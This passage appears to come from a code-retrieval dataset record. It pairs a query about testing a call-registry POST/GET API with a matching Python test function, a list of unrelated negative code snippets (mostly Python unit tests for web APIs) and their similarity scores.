self._ping()\n\n if self._sut.os == 'Linux':\n self._linux_power_control()\n elif self._sut.os == 'Windows':\n self._windows_power_control()\n else:\n raise CoreError(\"Unknown OS platform: {0}\".format(self._sut.os))\n\n if self._wait:\n sleep(BespokeGlobals.VM_BOOT_WAIT)\n\n self._status = 'Pass'\n except CoreError as e:\n self._status = 'Fatal'\n self._message = e.msg\n finally:\n self._close_staf_handle()\n\n #Notify TestCase that a failure occurred.\n if self._status == 'Fatal': raise FatalError(self._message)", "def test_isRunning_valve_noPump(self):\n\t\tdef mock_def(uri, *args):\n\t\t\tif(uri == u\"ch.db.getdevicedata\"):\n\t\t\t\treturn {'name':'testValve', 'type':'valve', 'group':1, 'id':1, 'description': ''}\n\t\t\telif(uri == u\"ch.gpio.isrunning\"):\n\t\t\t\tif(args[0] == 1):\n\t\t\t\t\treturn True\n\t\t\t\telse:\n\t\t\t\t\traise ValueError(\"Given device id does not exist ({})\".format(args[0]))\n\t\t\telif(uri == u\"ch.gpio.switch\"):\n\t\t\t\treturn \"success\"\n\t\t\telif(uri == u\"ch.db.getdevicegroup\"):\n\t\t\t\treturn []\n\t\t\telse:\n\t\t\t\traise ValueError(\"Given URI does not exist ({})\".format(uri))\n\t\tdm = DeviceManager()\n\t\tdm.sessionID = None\n\t\tdm.call=MagicMock(side_effect=mock_def)\n\t\tdm.publish = MagicMock()\n\t\tself.assertEqual(self.successResultOf(dm.switchIfAllowed('testValve', None)), \"success\")", "def test_get_results(self):\n pass", "def test_run_prefix__filter_success(mocker):\n runner = CliRunner()\n mocked_login = mocker.patch.object(APIClient, \"login\", return_value=None)\n mocked_uploads_copy = copy.deepcopy(MOCKED_UPLOADS)\n del mocked_uploads_copy[\"results\"][1]\n mocked_get_sample_sheet = mocker.patch.object(\n APIClient,\n \"get_sample_sheet\",\n return_value=SampleSheet(**mocked_uploads_copy),\n )\n mocked_add_samples_to_project = mocker.patch.object(\n APIClient,\n \"add_samples_to_project\",\n )\n\n res = runner.invoke(\n run_prefix,\n [\n str(uuid4()),\n \"gncv://batch\",\n \"--status\",\n \"unassigned\",\n \"--email\",\n \"[email protected]\",\n \"--password\",\n \"123\",\n ],\n )\n assert res.exit_code == 0\n mocked_login.assert_called_once()\n mocked_get_sample_sheet.assert_called_once()\n mocked_add_samples_to_project.assert_called_once()\n assert \"Number of samples assigned to the project\" in res.output\n assert \"Assigning metadata to the uploaded samples.\" not in res.output", "def test_makeliststep_test():\n result = MakeListStep.call(par1=DEFAULT_PAR1, par2=DEFAULT_PAR2)\n\n assert result == DEFAULT_RESULT", "def test_run_ended(self):" ]
[ "0.7666267", "0.6480155", "0.63547766", "0.63009536", "0.6242489", "0.623529", "0.61790955", "0.6141608", "0.61038685", "0.6090213", "0.6060126", "0.6026361", "0.5984391", "0.59258854", "0.5911147", "0.5894738", "0.5893941", "0.5885163", "0.58836126", "0.5859428", "0.5853621", "0.58424735", "0.5832467", "0.581189", "0.5784105", "0.5783848", "0.5765767", "0.57650566", "0.5757758", "0.5756335", "0.57089907", "0.5702386", "0.5702168", "0.57018155", "0.56833047", "0.5681764", "0.5678018", "0.5673475", "0.5673475", "0.56597596", "0.5655864", "0.56363946", "0.56331784", "0.5628814", "0.5626802", "0.56212306", "0.56199795", "0.5606048", "0.5592981", "0.5585292", "0.5582767", "0.55786103", "0.5563068", "0.55530024", "0.55488074", "0.5548368", "0.55397356", "0.55278593", "0.5523607", "0.5510237", "0.55099434", "0.549857", "0.54977375", "0.54964614", "0.54957014", "0.54933834", "0.5488088", "0.54826945", "0.54606074", "0.5452612", "0.5450533", "0.5443458", "0.5440403", "0.5438665", "0.54372543", "0.54319817", "0.5419808", "0.541003", "0.5389453", "0.53891", "0.536971", "0.53667706", "0.5359618", "0.5357203", "0.53500086", "0.5349103", "0.5349028", "0.5346788", "0.53446424", "0.5344073", "0.5343744", "0.5341055", "0.5338932", "0.53322566", "0.53318715", "0.5328586", "0.53278244", "0.5324775", "0.5317329", "0.5315886" ]
0.6334782
3
Test POST a start call registry to registry API and expect recover it using a GET request. Test uses start_call_fx fixture
def test_post_a_start_call_and_recover_it_using_a_GET_request(client, start_call_fx): url = reverse_lazy('calls:registry-list') post_request = client.post(url, start_call_fx, content_type='application/json') assert post_request.status_code == status.HTTP_201_CREATED job_url = post_request.data.get('job_id') job_request = client.get(job_url) result = json.loads(job_request.data.get('result')) get_request = client.get(result.get('url')) response = get_request.json() assert get_request.status_code == status.HTTP_200_OK for key, value in start_call_fx.items(): assert value == response.get(key)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_post_a_start_and_stop_registry_and_get_a_call(client, start_call_fx,\n stop_call_fx):\n\n post_url = reverse_lazy('calls:registry-list')\n\n post_data = [start_call_fx, stop_call_fx]\n\n for data in post_data:\n response = client.post(post_url, data, content_type='application/json')\n assert response.status_code == status.HTTP_201_CREATED\n\n get_url = reverse_lazy('calls:call-list')\n\n response = client.get(get_url)\n\n assert len(response.data) == 1\n assert response.data[0].get('start_timestamp')\n assert response.data[0].get('stop_timestamp')", "def test_post_a_start_and_stop_registry_and_get_a_call_using_url(client,\n start_call_fx,\n stop_call_fx):\n\n post_url = reverse_lazy('calls:registry-list')\n\n post_data = [start_call_fx, stop_call_fx]\n\n for data in post_data:\n response = client.post(post_url, data, content_type='application/json')\n assert response.status_code == status.HTTP_201_CREATED\n\n get_url = reverse_lazy('calls:call-detail', kwargs={'call_id': 1})\n\n response = client.get(get_url)\n\n assert response.data.get('start_timestamp')\n assert response.data.get('stop_timestamp')", "def test_POST_a_call_and_expect_job_id_and_data_posted(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n response_data = response.json()\n\n assert response.status_code == status.HTTP_201_CREATED\n assert 'job_id' in response_data\n\n for item in start_call_fx.items():\n assert item in response_data['data'].items()", "def test_expect_data_posted_return_encapsulated_on_message_property_on_response(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n\n job_id = response.data.get('job_id')\n\n job = client.get(job_id)\n\n result = job.json()\n\n assert result.get('result')\n\n registry_url = json.loads(result.get('result'))\n\n assert client.get(registry_url.get('url')).status_code == status.HTTP_200_OK", "def test_expect_status_property_about_registry_process(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n\n job_id = response.data.get('job_id')\n\n job = client.get(job_id)\n\n assert job.data.get('status') == 'DONE'", "def test_start_post(self):\n response = self.client.open('/start',\n method='POST')\n self.assert200(response, \"Response body is : \" + response.data.decode('utf-8'))", "def test_expect_200Ok_response_GETting_a_job_id_URL(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n response_data = response.json()\n\n task_url = response_data.get('job_id', None)\n\n task_response = client.get(task_url)\n\n assert task_response.status_code == status.HTTP_200_OK", "def test_call_api_return_only_consolidated_calls(client, start_call_fx, stop_call_fx):\n\n post_url = reverse_lazy('calls:registry-list')\n\n start_call_fx_2 = copy(start_call_fx)\n start_call_fx_2['call_id'] = 2\n\n post_data = [start_call_fx, start_call_fx_2, stop_call_fx]\n\n for data in post_data:\n response = client.post(post_url, data, content_type='application/json')\n assert response.status_code == status.HTTP_201_CREATED\n\n get_url = reverse_lazy('calls:call-list')\n\n response = client.get(get_url)\n\n assert len(response.data) == 1", "def testTurbiniaStart(self, mock_create_request):\n mock_create_request.return_value = {\n \"request_id\": \"41483253079448e59685d88f37ab91f7\"\n }\n mock_api_instance = mock.MagicMock()\n mock_api_instance.create_request = mock_create_request\n self.turbinia_processor.requests_api_instance = mock_api_instance\n evidence = {\n \"type\": \"GoogleCloudDisk\",\n \"disk_name\": \"disk-1\",\n \"project\": \"project-1\",\n \"zone\": \"us-central1-f\",\n }\n request_id = self.turbinia_processor.TurbiniaStart(\n evidence=evidence, yara_rules=YARA_RULE)\n self.assertEqual(request_id, \"41483253079448e59685d88f37ab91f7\")", "def test_start_post(self):\n StartConfiguration = StartConfiguration()\n response = self.client.open(\n '/start',\n method='POST',\n data=json.dumps(StartConfiguration),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def test_create_startliste(http_service: Any) -> None:\n url = f\"{http_service}/start\"\n with open(\"tests/files/G11KvartStart.json\") as json_file:\n data = json.load(json_file)\n\n headers = {\"content-type\": \"application/json; charset=utf-8\"}\n response = requests.post(url, headers=headers, json=data)\n assert response.status_code == 201", "def test_call(self):\n\n with Client('username', 'password') as client:\n self.setSessionResponse(content='{\"ok\": true}')\n data = client.call(**self.build_parameters)\n self.assertEqual(data, '{\"ok\": true}')", "def test_available_incoming_call(self, *mocks):\n call_data = {\n 'sip_user_id': '123456789',\n 'caller_id': 'Test name',\n 'phonenumber': '0123456789',\n }\n\n # Call non existing device\n response = self.client.post(self.incoming_url, call_data)\n\n self.assertEqual(response.content, b'status=NAK')\n\n two_weeks_ago = datetime.now() - timedelta(days=14)\n Device.objects.create(\n name='test device',\n token='a652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',\n sip_user_id='123456789',\n os_version='8.3',\n client_version='1.0',\n last_seen=two_weeks_ago,\n app=self.ios_app,\n )\n call_data['call_id'] = 'sduiqayduiryqwuioeryqwer76789'\n\n # Now the device exists, call it again in seperate thread.\n thread = ThreadWithReturn(target=self.client.post, args=(self.incoming_url, call_data))\n thread.start()\n\n # Simulate some wait-time before device responds.\n time.sleep(1.5)\n\n app_data = {\n 'unique_key': call_data['call_id'],\n 'message_start_time': time.time(),\n }\n # Send the fake response from device.\n self.client.post(self.response_url, app_data)\n\n # Wait for the incoming-call to finish.\n response = thread.join()\n\n # Check if incoming-call got accepted.\n self.assertEqual(response.content, b'status=ACK')\n self.assertEqual(cache.get('attempts'), 2)", "def start_test(self, request):\n request.worker.start_test(request.message.test_id)\n\n return SuccessReply()", "def test_fax_inbound_automation_post(self):\n pass", "def test_available_incoming_call(self, *mocks):\n call_data = {\n 'sip_user_id': '123456789',\n 'caller_id': 'Test name',\n 'phonenumber': '0123456789',\n }\n\n # Call non existing device.\n response = self.client.post(self.incoming_url, call_data)\n self.assertEqual(response.content, b'status=NAK')\n\n two_weeks_ago = datetime.now() - timedelta(days=14)\n Device.objects.create(\n name='test device',\n token='a652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',\n sip_user_id='123456789',\n os_version='8.3',\n client_version='1.0',\n last_seen=two_weeks_ago,\n app=self.android_app,\n )\n call_data['call_id'] = 'asdr2378945auhfjkasdghf897eoiehajklh'\n\n # Now the device exists, call it again in seperate thread.\n thread = ThreadWithReturn(target=self.client.post, args=(self.incoming_url, call_data))\n thread.start()\n\n # Simulate some wait-time before device responds.\n time.sleep(1.5)\n\n app_data = {\n 'unique_key': call_data['call_id'],\n 'message_start_time': time.time(),\n }\n # Send the fake response from device.\n self.client.post(self.response_url, app_data)\n\n # Wait for the incoming-call to finish.\n response = thread.join()\n\n # Check if incoming-call got accepted.\n self.assertEqual(response.content, b'status=ACK')\n self.assertEqual(cache.get('attempts'), 2)", "def test_ready_post(self):\n response = self.client.open(\n '/ready',\n method='POST')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def test_start_machine(self, pretty_print, owner_api_token):\n machine = setup_data.get('start_machine', {}).get('machine') \\\n or setup_data.get('machine') or 'my-machine'\n uri = MIST_URL + \\\n '/api/v2/machines/{machine}/actions/start'.format(machine=machine)\n request = MistRequests(\n api_token=owner_api_token,\n uri=uri)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'start_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(\n api_token=owner_api_token,\n uri=setup_data['amazon_machine_uri'],\n data={'state': 'running', 'actions': {'stop': True}},\n timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')", "async def test_create_dispatch_route(client):\n create_dispatch_route_params = null\n params = [('access_token', 'access_token_example')]\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = await client.request(\n method='POST',\n path='/v1/fleet/dispatch/routes',\n headers=headers,\n json=create_dispatch_route_params,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "def test_start(http_service: Any) -> None:\n url = f\"{http_service}/start\"\n response = requests.get(url)\n\n assert response.status_code == 200\n assert response.headers[\"content-type\"] == \"text/html; charset=utf-8\"\n\n assert len(response.text) > 0", "async def test_api_call_service_no_data(\n hass: HomeAssistant, mock_api_client: TestClient\n) -> None:\n test_value = []\n\n @ha.callback\n def listener(service_call):\n \"\"\"Record that our service got called.\"\"\"\n test_value.append(1)\n\n hass.services.async_register(\"test_domain\", \"test_service\", listener)\n\n await mock_api_client.post(\"/api/services/test_domain/test_service\")\n await hass.async_block_till_done()\n assert len(test_value) == 1", "def call_init(mac_address, ip_address, start_port, free_ports):\n url = INIT_URL\n init_dict = {'IPAddress': ip_address, 'MacAddress': mac_address, 'OpenPorts': free_ports, 'StartPort': start_port}\n logging.info(\"Calling coordinator at url: %s, with dict: %s\", url, str(init_dict))\n try:\n resp = requests.post(url, json=init_dict, timeout=10)\n except requests.exceptions.RequestException as e:\n return None, e\n return resp, None", "def test_request_first_step(self, mock_step1_is_complete):\n mock_step1_is_complete.return_value = False\n\n self.tour1.load_tour_class().add_user(self.test_user)\n mock_request = Mock(user=self.test_user, path='mock1', method='get', GET={})\n mock_view = MockView(request=mock_request)\n response = mock_view.dispatch(mock_request)\n self.assertEqual(200, response.status_code)", "def test_run(self, mock):\n mock.return_value = mock_trello_service()\n\n pull_requests = PullRequest.query.all()\n self.assertTrue(len(pull_requests) is 0)\n\n payload = json_fixture('./tests/fixtures/pull_request_opened.json')\n CreatePullRequestCard.delay(\n board_id=default_board_id,\n list_id=default_list_id,\n name='Fake Pull Request',\n payload=payload\n )\n\n # Enqueuing new pull_request `CreatePullRequestCard` should create a\n # `PullRequest` record\n new_pull_requests = PullRequest.query.all()\n self.assertTrue(len(new_pull_requests) is 1)", "async def test_api_call_service_with_data(\n hass: HomeAssistant, mock_api_client: TestClient\n) -> None:\n\n @ha.callback\n def listener(service_call):\n \"\"\"Record that our service got called.\n\n Also test if our data came through.\n \"\"\"\n hass.states.async_set(\n \"test.data\",\n \"on\",\n {\"data\": service_call.data[\"test\"]},\n context=service_call.context,\n )\n\n hass.services.async_register(\"test_domain\", \"test_service\", listener)\n\n resp = await mock_api_client.post(\n \"/api/services/test_domain/test_service\", json={\"test\": 1}\n )\n data = await resp.json()\n assert len(data) == 1\n state = data[0]\n assert state[\"entity_id\"] == \"test.data\"\n assert state[\"state\"] == \"on\"\n assert state[\"attributes\"] == {\"data\": 1}", "def start():\n\n config = os.path.join(tempfile.gettempdir(), \"testapi.yml\")\n\n with open(config, \"w\", encoding=\"utf-8\") as output:\n output.write(WORKFLOWS)\n\n client = TestClient(app)\n start()\n\n return client", "def pytest_runtest_call(self, item):\n if not item.config.option.tc_duration:\n self.detailed_duration[item.nodeid]['call'] = time.time()\n\n if self._buildname is None:\n self.buildname(item.config.env.env_prop)\n if self._buildname is not None and not self._init_session:\n self._sessionstart(item)\n self._init_session = True\n self._send_post_request(item)", "def test_request_spartan_grasp(self, *args, **kwargs):\n self.taskRunner.callOnThread(self.request_spartan_grasp, *args, **kwargs)", "def Start(sliver_name):\n rec = sliver_name\n account.get(rec['name']).start(rec)\n logger.log(\"api_calls: Start %s\"%rec['name'])", "def test_turnon(\n fauxmo_server: pytest.fixture, simplehttpplugin_target: pytest.fixture\n) -> None:\n data = (\n b'SOAPACTION: \"urn:Belkin:service:basicevent:1#SetBinaryState\"'\n b\"<BinaryState>1</BinaryState>\"\n )\n\n resp = requests.post(\n \"http://127.0.0.1:12345/upnp/control/basicevent1\", data=data\n )\n assert resp.status_code == 200", "def setUp(self):\n self.client = APIClient()\n\n self.speciality = models.Speciality.objects.create(\n name='Speciality'\n )\n\n self.payload = {\n 'name': \"Knee Replacement\",\n 'speciality': [self.speciality.pk],\n 'days_in_hospital': 2,\n 'days_in_destination': 2,\n 'duration_minutes': 120,\n 'overview': '<strong>Bla</strong> bla bla',\n }", "def test_run_workflow_by_payload(self):\n full_task_payload = {\n \"workflow_name\" : \"workflow_name\",\n \"input_mappings\" : \"input_mappings\"\n}\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = self.client.open(\n '/run/workflow/',\n method='POST',\n headers=headers,\n data=json.dumps(full_task_payload),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def test_request(comms):\n kernel_comm, frontend_comm = comms\n\n def handler(a, b):\n return a + b\n\n kernel_comm.register_call_handler('test_request', handler)\n\n res = frontend_comm.remote_call(blocking=True).test_request('a', b='b')\n\n assert res == 'ab'", "def test_POST_fetcher():\n params = {\n 'key1':'value1',\n 'arg2':'value2'\n }\n data = {\n 'data1':'value1',\n 'data2':'morevalues'\n }\n\n ## test that request goes ok\n resp = wf_utils.fetch_POST_request(\n POST_ECHO_ENDPOINT,\n data,\n params=params\n )\n\n ## test that response can be parsed\n payload = resp.json()\n\n ## test that response contains expected echo\n assert payload['args'] == params\n assert payload['data'] == data\n assert payload['headers']['user-agent'] == wf_utils.USER_AGENT", "def test_registry_login_positive(self, request_api_mock):\n result = registry_login(\"username\", \"password\")\n expected_result = \"key\"\n self.assertEqual(result, expected_result)\n request_api_mock.assert_called_once()", "def test_start_refresh(api: API, account: Account):\n api.candlepin.refresh.return_value = {\"id\": 123456} # type: ignore\n account.start_refresh()\n api.candlepin.refresh.assert_called_once() # type: ignore\n assert account._latest_refresh_job_id == 123456", "def test_api_post(httpretty, new_job):\n url = 'https://salesforce/services/async/34.0/job/THEJOBID'\n httpretty.register_uri('POST', url, status=201, body=b'some xml and stuff')\n response = new_job.request('post', url, data=b'stuff')\n assert response == b'some xml and stuff'\n assert httpretty.last_request().body == b'stuff'", "def test_success_start(self, put, get, auth, circuits_app, fn_cloud_foundry_action, fn_cloud_foundry_applications):\n auth.return_value = AuthenticationMock()\n put.return_value = give_response(201, GUIDS_MOCK[\"resources\"][0])\n get.return_value = give_response(200, GUIDS_MOCK)\n\n function_params = {\n \"fn_cloud_foundry_action\": fn_cloud_foundry_action,\n \"fn_cloud_foundry_applications\": fn_cloud_foundry_applications\n }\n results = call_fn_cloud_foundry_manage_applications_function(circuits_app, function_params)\n assert results[\"test1\"][\"success\"] == True\n assert results[\"test1\"][\"current_state\"] == \"STARTED\"", "def test_post(self):\n self.client.force_login(self.john)\n\n with self.subTest(\"Test start task success\"):\n resp = self.client.post(self.URL, data={'taskType': 1})\n\n self.assertEqual(\n resp.status_code,\n status.HTTP_201_CREATED,\n \"Gamer cant create the task via API!\"\n )\n\n with self.subTest(\"Start the same task again fail\"):\n resp = self.client.post(self.URL, data={'taskType': 1})\n\n self.assertEqual(\n resp.status_code,\n status.HTTP_409_CONFLICT\n )", "def test_create_empty_payload(self):\n response = self.client.post('/routines/', data={})\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)", "def start_test_run(self, request):\n request.worker.initialize_test_run(request.message.tests,\n request.message.run_data)\n\n return SuccessReply()", "def test():\n request = pb2.TestRequest.FromString(flask.request.get_data())\n logger.debug(\"Flask service received: %s\", request)\n\n if not request.service_hops:\n response = pb2.TestResponse(\n id=request.id,\n status=[pb2.CommonResponseStatus(\n status=pb2.SUCCESS,\n )],\n )\n else:\n status = ([pb2.CommonResponseStatus(status=pb2.SUCCESS)] +\n list(service.call_next(request).status))\n response = pb2.TestResponse(id=request.id, status=status)\n\n tracer = execution_context.get_opencensus_tracer()\n tracer.add_attribute_to_current_span(\"reqId\", request.id)\n return response.SerializeToString()", "def test_run(self) -> None:\n startDate = dt.datetime.now() - dt.timedelta(days=1)\n endDate = startDate\n\n rawFreqCreator = RawFrequencyCreationHandler(\n self.appConfig['rawFrequencyCreationServiceUrl'])\n resp = rawFreqCreator.createRawFrequency(startDate, endDate)\n self.assertTrue(resp['isSuccess'])\n self.assertTrue(resp['status'] == 200)\n self.assertTrue('message' in resp)", "async def test_fn_create(app: Quart) -> None:\n test_client = app.test_client()\n response = await test_client.post(\n \"/fn\", json=VALID_TASK_BASIC\n )\n assert response.status_code == 200\n response_json = await response.get_json()\n assert response_json == VALID_TASK_BASIC", "def post(self):\n data = api.payload\n\n try:\n phone_call = PhoneCallStart(\n parser.parse(data[\"start_timestamp\"]),\n data[\"call_id\"],\n data[\"source\"],\n data[\"destination\"]\n )\n except AssertionError as error:\n return error.args, 400\n\n repository.db.session.add(phone_call)\n repository.db.session.commit()\n\n return phone_call, 201", "def testPostEndpoints(self):\n # Register an exporter\n context = self.framework.get_bundle_context()\n exporter = Exporter(context)\n context.register_service(pelix.remote.SERVICE_EXPORT_PROVIDER,\n exporter, {})\n\n # Register an importer\n importer = ImportListener()\n context.register_service(pelix.remote.SERVICE_IMPORT_ENDPOINT_LISTENER,\n importer,\n {pelix.remote.PROP_REMOTE_CONFIGS_SUPPORTED:\n exporter.configs[0]})\n\n # Register a service\n context.register_service(\"sample.spec\", object(),\n {pelix.remote.PROP_EXPORTED_INTERFACES: \"*\"})\n\n # Get the endpoint bean\n endpoint = exporter.endpoints[-1]\n\n # Get its representation\n status, response = self._http_get(\"/endpoint/{0}\".format(endpoint.uid))\n self.assertEqual(status, 200)\n\n # Change its UID and framework UID\n endpoint_data = json.loads(response)\n endpoint_data['uid'] = 'other-uid'\n endpoint_data['name'] = 'other-name'\n endpoint_data['sender'] = 'other-framework'\n\n # Send the 'discovered' event\n status, response = self._http_post(\"endpoints\",\n json.dumps([endpoint_data]))\n self.assertEqual(status, 200)\n self.assertEqual(response, 'OK')\n\n # Ensure that the service has been registered\n imported_endpoint = importer.endpoints[endpoint_data['uid']]\n self.assertEqual(imported_endpoint.uid, endpoint_data['uid'])\n self.assertEqual(imported_endpoint.framework, endpoint_data['sender'])\n self.assertEqual(imported_endpoint.name, endpoint_data['name'])", "def test_service_call(self, create_connection):\n create_connection.return_value = Mock()\n create_connection.return_value.recv = Mock(return_value=msgpack.packb(None))\n\n adress = ('127.0.0.1', 20001)\n method_name = 'foo'\n method_params = [12]\n\n expected_data = service_call.encode_call(method_name, method_params)\n\n service_call.call(adress, method_name, method_params)\n\n create_connection.assert_any_call(adress)\n create_connection.return_value.sendall.assert_any_call(expected_data)", "def setUp(self):\n self.staff = get_user_model().objects.create_user(\n email='[email protected]',\n password='staffpassword1234',\n username='staffusername'\n )\n self.staff.is_staff = True\n self.staff.save()\n self.staff.refresh_from_db()\n\n self.client = APIClient()\n self.client.force_authenticate(user=self.staff)\n\n self.speciality = models.Speciality.objects.create(\n name='Speciality'\n )\n\n self.payload = {\n 'name': \"Knee Replacement\",\n 'speciality': [self.speciality.id],\n 'overview': '<strong>Bla</strong> bla bla',\n }\n\n \"\"\"Test that list procedure is success\"\"\"\n p1 = models.Procedure.objects.create(\n name=\"procedure1\",\n overview='bla bla bla'\n )\n p1.speciality.set([self.speciality.pk])\n p1.save()\n\n p2 = models.Procedure.objects.create(\n name=\"procedure2\",\n overview='bla bla bla'\n )\n p2.speciality.set([self.speciality.pk])\n p2.save()\n\n res = self.client.get(PROCEDURE_URL)\n\n procedures = models.Procedure.objects.all().order_by(\"-name\")\n ser = serializer.ProcedureSerializer(procedures, many=True)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 2)\n self.assertEqual(res.data, ser.data)", "def test_callback_calls_celery_task(self, rf):\n product = product_factory()\n request = rf.post('/')\n\n url = request.build_absolute_uri(product.get_absolute_url())\n\n with patch('remindme.tasks.send_notification_email.delay') as task:\n product_in_stock_callback(\n self.__class__, product=product, request=request\n )\n task.assert_called_with(product.pk, product.title, url)", "def test_make_request_method(self, m_requests, m_sleep):\r\n request = testing.DummyRequest({mut.URL_KEY: SAMPLE_URL, \r\n mut.METHOD_KEY: SAMPLE_METHOD})\r\n m_response, response_dict = self.mock_response()\r\n m_requests.post.return_value = m_response\r\n self.assertEqual(response_dict, mut.make_request(request))\r\n m_requests.post.assert_called_with(url=SAMPLE_URL)\r\n m_sleep.assert_called_with(mut.SECURITY_SLEEP)", "def test_restart(self, mocked_check):\n from supvisors.rpcinterface import RPCInterface\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test RPC call\n self.assertTrue(rpc.restart())\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call()],\n self.supervisor.supvisors.fsm.on_restart.call_args_list)", "def run_single_test(self, config):\n path_name = config['path_name']\n for request in config['request']:\n with self.subTest(request=request, test_name=config['test_name']):\n if 'args' in request:\n url = reverse(path_name, kwargs=request['args'])\n else:\n url = reverse(path_name)\n\n query_params = None\n if 'query_params' in request:\n query_params = urlencode(request['query_params'])\n url = '{}?{}'.format(url, query_params)\n\n data = None\n data_format = 'json'\n if 'data' in request:\n data = request['data']\n\n if 'data_format' in request:\n data_format = request['data_format']\n\n response_check = None\n if 'response_check' in request:\n response_check = request['response_check']\n\n self.call_api(\n url,\n data,\n self.tokens[request['user']],\n request['status'],\n config['type'],\n data_format=data_format,\n response_check=response_check)", "async def test_create_vehicle_dispatch_route(client):\n create_dispatch_route_params = null\n params = [('access_token', 'access_token_example')]\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = await client.request(\n method='POST',\n path='/v1/fleet/vehicles/{vehicle_id}/dispatch/routes'.format(vehicle_id=56),\n headers=headers,\n json=create_dispatch_route_params,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "async def test_setup_post(hass: HomeAssistant) -> None:\n respx.post(\"http://localhost\").respond(\n status_code=HTTPStatus.OK, json={\"key\": \"123\"}\n )\n assert await async_setup_component(\n hass,\n SENSOR_DOMAIN,\n {\n SENSOR_DOMAIN: {\n \"platform\": DOMAIN,\n \"resource\": \"http://localhost\",\n \"method\": \"POST\",\n \"value_template\": \"{{ value_json.key }}\",\n \"payload\": '{ \"device\": \"toaster\"}',\n \"name\": \"foo\",\n \"unit_of_measurement\": UnitOfInformation.MEGABYTES,\n \"verify_ssl\": \"true\",\n \"timeout\": 30,\n \"authentication\": \"basic\",\n \"username\": \"my username\",\n \"password\": \"my password\",\n \"headers\": {\"Accept\": CONTENT_TYPE_JSON},\n }\n },\n )\n await hass.async_block_till_done()\n assert len(hass.states.async_all(SENSOR_DOMAIN)) == 1", "def test_fax_inbound_automation_get(self):\n pass", "def test_get_one_flow_requests_as_super_client(self):\n headers = self._get_oauth_header(client_name=DISPATCHER_NAME)\n res = self.client.get('/v1/flow_requests/p_11111/', **headers)\n self.assertEqual(res.status_code, 200)\n profile = {\n 'code': 'PROF_001',\n 'version': 'v0',\n 'payload': '[{\"clinical_domain\": \"Laboratory\"}]'\n }\n expected = {\n 'flow_id': 'f_11111',\n 'process_id': 'p_11111',\n 'status': 'PE',\n 'profile': profile,\n 'sources': [{\n 'source_id': SOURCE_1_ID,\n 'name': SOURCE_1_NAME,\n 'profile': profile\n }],\n 'start_validity': '2017-10-23T10:00:00+02:00',\n 'expire_validity': '2018-10-23T10:00:00+02:00'\n }\n self.assertDictEqual(res.json(), expected)", "def test_single_request(self):\n s = self.api.session()\n s.request(\"1.2.3.4\", \"mozilla\", \"/foo/bar\").end()\n s.end()\n data = self.connector.transcription()\n assert len(data) == 2\n assert data[0].get('action') == \"session_start\"\n assert data[1].get('action') == \"session_end\"", "def test_ai_create_registred(self, mock_get_categories):\n\n response = self.client.get(reverse('studio:ai.wizard'))\n self.assertEqual(response.status_code, 200)", "async def test_create_dvir(client):\n create_dvir_param = {}\n params = [('access_token', 'access_token_example')]\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = await client.request(\n method='POST',\n path='/v1/fleet/maintenance/dvirs',\n headers=headers,\n json=create_dvir_param,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "def test_request():\n return make_response(\"ok\")", "def test_fund_withdrawal_start(self):\r\n with self.client as c:\r\n results = c.post(\r\n \"/retiros-para-agotar-fondos\",\r\n data=json.dumps(RETIRO_PARA_FONDO_JSON_1),\r\n headers=TestRetirementCalculator.request_headers,\r\n )\r\n data = json.loads(results.data)\r\n\r\n self.assertDictEqual(data, RETIRO_PARA_FONDO_RESULT_1)", "def test_data_framing(self):\n self.start_all_services()\n deproxy_cl = self.get_client(\"deproxy\")\n deproxy_cl.parsing = False\n request_body = \"x\" * 100\n\n deproxy_cl.make_request(request=self.post_request, end_stream=False)\n for byte in request_body[:-1]:\n deproxy_cl.make_request(request=byte, end_stream=False)\n deproxy_cl.make_request(request=request_body[-1], end_stream=True)\n\n self.__assert_test(client=deproxy_cl, request_body=request_body, request_number=1)", "def test_post(self):\n client = RestClient(host=self.host, username='')\n rest_url = 'some/url/'\n \n # Mock good response\n with responses.RequestsMock() as rsps:\n rsps.add(responses.POST, f'{self.host}/{rest_url}', status=200,\n json={'value':\"good!\"})\n r = client.post(rest_url)", "def test_build_payload(self):\n pytrend = TrendReq()\n pytrend.build_payload(kw_list=['pizza', 'bagel'])\n self.assertIsNotNone(pytrend.token_payload)", "def test_get_start_form_data(self):\n pass", "def test_get_start_true(self):\n\n tt = TemperatureTracker()\n tt.start()\n self.assertIsNotNone(tt.get_start())", "def start_flow():\n if request.method == 'GET':\n tel = request.args.get('tel')\n flow = request.args.get('flow')\n to_rp = request.args.get('to')\n if to_rp == \"io\":\n client = io_client\n elif to_rp == \"datos\":\n client = mx_client\n else:\n return jsonify({}), 